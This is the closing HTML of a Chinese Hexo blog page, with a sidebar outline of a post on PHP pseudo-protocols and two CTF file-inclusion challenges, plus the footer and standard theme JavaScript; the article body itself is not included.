class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E4%BB%80%E4%B9%88%E6%98%AFPHP%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="toc-number">1.</span> <span class="toc-text">
          一.什么是PHP伪协议</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E5%B8%B8%E8%A7%81%E7%9A%84PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="toc-number">2.</span> <span class="toc-text">
          二.常见的PHP伪协议</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-file"><span class="toc-number">2.1.</span> <span class="toc-text">
          1.file:&#x2F;&#x2F;</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-php"><span class="toc-number">2.2.</span> <span class="toc-text">
          2.php:&#x2F;&#x2F;</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-gt-php-filter"><span class="toc-number">2.2.1.</span> <span class="toc-text">
          1&gt;php:&#x2F;&#x2F;filter</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-gt-php-input"><span class="toc-number">2.2.2.</span> <span class="toc-text">
          2&gt;php:&#x2F;&#x2F;input</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-data-x2F-x2F"><span class="toc-number">2.3.</span> <span class="toc-text">
          3.data:&#x2F;&#x2F;</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-phar-x2F-x2F"><span class="toc-number">2.4.</span> <span class="toc-text">
          4.phar:&#x2F;&#x2F;</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89-CTF%E9%A2%98%E7%9B%AE%E5%AE%9E%E6%88%98"><span class="toc-number">3.</span> <span class="toc-text">
          三.CTF题目实战</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01-ACTF2020-%E6%96%B0%E7%94%9F%E8%B5%9B-Include"><span class="toc-number">3.1.</span> <span class="toc-text">
          0x01.[ACTF2020 新生赛]Include</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x02-SWPUCTF-2018-SimplePHP"><span class="toc-number">3.2.</span> <span class="toc-text">
          0x02.[SWPUCTF 2018]SimplePHP</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B-%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5%EF%BC%9A"><span class="toc-number">4.</span> <span class="toc-text">
          四.参考链接：</span></a></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/head.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">不确定的话，那就遵从兴趣吧</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">2</div><div class="sidebar-ov-state-item__name">归档</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">0</div><div class="sidebar-ov-state-item__name">分类</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">1</div><div class="sidebar-ov-state-item__name">标签</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh-cn" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>由 <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> 大力支持</span><span> v6.3.0</span><span class="footer__devider">|</span><span>主题 - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.8.0</span></div><div>看到最后是不是觉得我很菜</div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/pjax@latest/pjax.min.js"></script><script>window.addEventListener('DOMContentLoaded', function () {
  var pjax = new Pjax({"selectors":["head title","#main",".pjax-reload",".header-banner"],"history":true,"scrollTo":false,"scrollRestoration":false,"cacheBust":false,"debug":false,"currentUrlFullReload":false,"timeout":0});
  // 加载进度条的计时器
  var loadingTimer = null;

  // 重置页面 Y 方向上的滚动偏移量
  document.addEventListener('pjax:send', function () {
    $('.header-nav-menu').removeClass('show');
    if (CONFIG.pjax && CONFIG.pjax.avoidBanner) {
      $('html').velocity('scroll', {
        duration: 500,
        offset: $('#header').height(),
        easing: 'easeInOutCubic'
      });
    }

    var loadingBarWidth = 20;
    var MAX_LOADING_WIDTH = 95;

    $('.loading-bar').addClass('loading');
    $('.loading-bar__progress').css('width', loadingBarWidth + '%');
    clearInterval(loadingTimer);
    loadingTimer = setInterval(function () {
      loadingBarWidth += 3;
      if (loadingBarWidth > MAX_LOADING_WIDTH) {
        loadingBarWidth = MAX_LOADING_WIDTH;
      }
      $('.loading-bar__progress').css('width', loadingBarWidth + '%');
    }, 500);
  }, false);

  window.addEventListener('pjax:complete', function () {
    clearInterval(loadingTimer);
    $('.loading-bar__progress').css('width', '100%');
    $('.loading-bar').removeClass('loading');
    setTimeout(function () {
      $('.loading-bar__progress').css('width', '0');
    }, 400);
    $('link[rel=prefetch], script[data-pjax-rm]').each(function () {
      $(this).remove();
    });
    $('script[data-pjax], #pjax-reload script').each(function () {
      $(this).parent().append($(this).remove());
    });

    if (Stun.utils.pjaxReloadBoot) {
      Stun.utils.pjaxReloadBoot();
    }
    if (Stun.utils.pjaxReloadScroll) {
      Stun.utils.pjaxReloadScroll();
    }
    if (Stun.utils.pjaxReloadSidebar) {
      Stun.utils.pjaxReloadSidebar();
    }
    if (false) {
      if (Stun.utils.pjaxReloadHeader) {
        Stun.utils.pjaxReloadHeader();
      }
      if (Stun.utils.pjaxReloadScrollIcon) {
        Stun.utils.pjaxReloadScrollIcon();
      }
      if (Stun.utils.pjaxReloadLocalSearch) {
        Stun.utils.pjaxReloadLocalSearch();
      }
    }
  }, false);
}, false);</script><div id="pjax-reload"><script src="https://cdn.jsdelivr.net/npm/quicklink@1.0.1/dist/quicklink.umd.js"></script><script>function initQuicklink() {
  quicklink({
    timeout: '10000',
    priority: true,
    ignores: [uri => uri.includes('#'), uri => uri === 'http://example.com/2022/12/09/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE%E5%AE%9E%E6%88%98%E5%88%86%E6%9E%90/', /\/api\/?/,uri => uri.includes('.xml'),uri => uri.includes('.zip'),(uri, el) => el.hasAttribute('nofollow'),(uri, el) => el.hasAttribute('noprefetch')]
  });
}

if (true || false) {
  initQuicklink();
} else {
  window.addEventListener('DOMContentLoaded', initQuicklink, false);
}</script></div><script src="/js/utils.js?v=2.8.0"></script><script src="/js/stun-boot.js?v=2.8.0"></script><script src="/js/scroll.js?v=2.8.0"></script><script src="/js/header.js?v=2.8.0"></script><script src="/js/sidebar.js?v=2.8.0"></script></body></html>